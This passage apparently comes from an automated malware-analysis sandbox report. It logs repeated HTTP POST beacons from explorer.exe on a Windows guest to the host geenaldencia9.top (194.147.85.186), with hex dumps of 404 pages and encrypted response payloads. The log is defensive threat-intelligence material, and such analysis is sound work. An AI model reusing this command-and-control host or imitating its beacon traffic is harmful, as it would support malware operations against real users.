Sep 27, 2021 19:34:43.978375912 CEST | 13443 | IN | HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:34:43 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.6 | 49808 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:44.147234917 CEST | 13444 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 173
Host: geenaldencia9.top
Sep 27, 2021 19:34:44.395401955 CEST | 13444 | IN | HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:34:44 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.6 | 49810 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:44.499569893 CEST | 13445 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 122
Host: geenaldencia9.top
Sep 27, 2021 19:34:44.657134056 CEST | 13446 | IN | HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:34:44 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.6 | 49811 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:44.969166040 CEST | 13447 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 170
Host: geenaldencia9.top
Sep 27, 2021 19:34:45.146166086 CEST | 13448 | IN | HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:34:45 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 49812 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Sep 27, 2021 19:34:45.225800037 CEST | kBytes transferred: 13449 | Direction: OUT | Data:
POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 258
Host: geenaldencia9.top
Timestamp: Sep 27, 2021 19:34:45.377901077 CEST | kBytes transferred: 13449 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:34:45 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 49813 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Sep 27, 2021 19:34:45.879954100 CEST | kBytes transferred: 13450 | Direction: OUT | Data:
POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 140
Host: geenaldencia9.top
Timestamp: Sep 27, 2021 19:34:46.036946058 CEST | kBytes transferred: 13451 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:34:45 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 49815 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Sep 27, 2021 19:34:46.150823116 CEST | kBytes transferred: 13456 | Direction: OUT | Data:
POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 203
Host: geenaldencia9.top
Timestamp: Sep 27, 2021 19:34:46.312568903 CEST | kBytes transferred: 13458 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:34:46 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 2 | Source IP: 192.168.2.6 | Source Port: 49768 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Sep 27, 2021 19:34:19.019926071 CEST | kBytes transferred: 1415 | Direction: OUT | Data:
POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 318
Host: geenaldencia9.top
Timestamp: Sep 27, 2021 19:34:19.167814016 CEST | kBytes transferred: 1415 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:34:19 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 72
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d be 51 d8 6d a5 1b 46 9b 10 bc bd 79 b3 64 41 11 ac b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4a 35 a9 f2 e0
                                                                                                                                                                                                  Data Ascii: I:82OOjQmFydA@dfkJ5


Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 49816 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Sep 27, 2021 19:34:46.404578924 CEST | kBytes transferred: 13460 | Direction: OUT | Data:
POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 124
Host: geenaldencia9.top
Timestamp: Sep 27, 2021 19:34:46.588947058 CEST | kBytes transferred: 13462 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:34:46 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 21 | Source IP: 192.168.2.6 | Source Port: 49818 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Sep 27, 2021 19:34:46.718038082 CEST | kBytes transferred: 13463 | Direction: OUT | Data:
POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 321
Host: geenaldencia9.top
Timestamp: Sep 27, 2021 19:34:46.864677906 CEST | kBytes transferred: 13464 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:34:46 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.6 | 49820 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:47.060090065 CEST | 13767 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 115
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:34:47.209739923 CEST | 14938 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:47 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 32 31 38 30 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7e 9f fe 8c e1 9e 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 1a 7d 6f 01 e0 04 89 9f dd 57 80 90 70 89 ae ff 4a 6b b6 e2 a2 22 48 22 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d2 ce 4e 49 b3 0b 5e 4c 65 55 5b ad 30 7a 83 bb 21 ca c3 e7 b2 ec f2 f1 0d 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 04 13 10 87 1e b1 b8 56 6c 79 f7 0a 83 8b 71 91 e0 e5 d9 66 d9 1b 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 51 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 12 32 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9d 82 eb d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 93 72 3e 9d 43 cd 17 fe 2f bf 9e f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 7a 50 67 74 40 b9 87 f6 88 81 de bb 6e 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef c3 de 47 dc ea c0 38 02 97 b5 a4 57 25 
c1 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a c6 c1 22 7d e6 02 61 60 b9 d6 31 eb cd ae 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 69 81 77 af dd c6 83 41 67 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 a2 fa 56 d0 54 25 cf 66 2b 23 e4 93 32 e6 86 5a 26 39 1a 59 ae f5 cf 98 24 b1 9e e9 ea 33 9d f1 e1 2a e0 c2 28 5e 98 11 9a 4e 6a 8e ca 8d 0b da ca e4 46
                                                                                                                                                                                                  Data Ascii: 21802S(SW\/iP"&&grq|6?eIJ5~/arR`g1Q5ih.Kw:i/+".]pW!RY8|-:+%Wt#xQP0ObyT=a'4 YW\|;fKMXKw[Ge)29E"|~6N}oWpJk"H"I?m|6NI^LeU[0z!U5=PoV`GZVlyqfvy'$X9:-C'GkKmQ`#>[qJ8-,sq2K0Z"?+Qz`JMQAd'\#&Q#2YBAr>C/fGB%4VF>"7"h*6VzPgt@nk6'NGc:HNDG8W%bJ}Tzl9\@d="}a`1$@N!;KniwAg0!Wnawjg";kzR{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59VT%f+#2Z&9Y$3*(^NjF


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.6 | 49822 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:48.783638954 CEST | 15080 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:34:49.141146898 CEST | 15081 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:48 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.6 | 49823 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:49.325970888 CEST | 15082 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
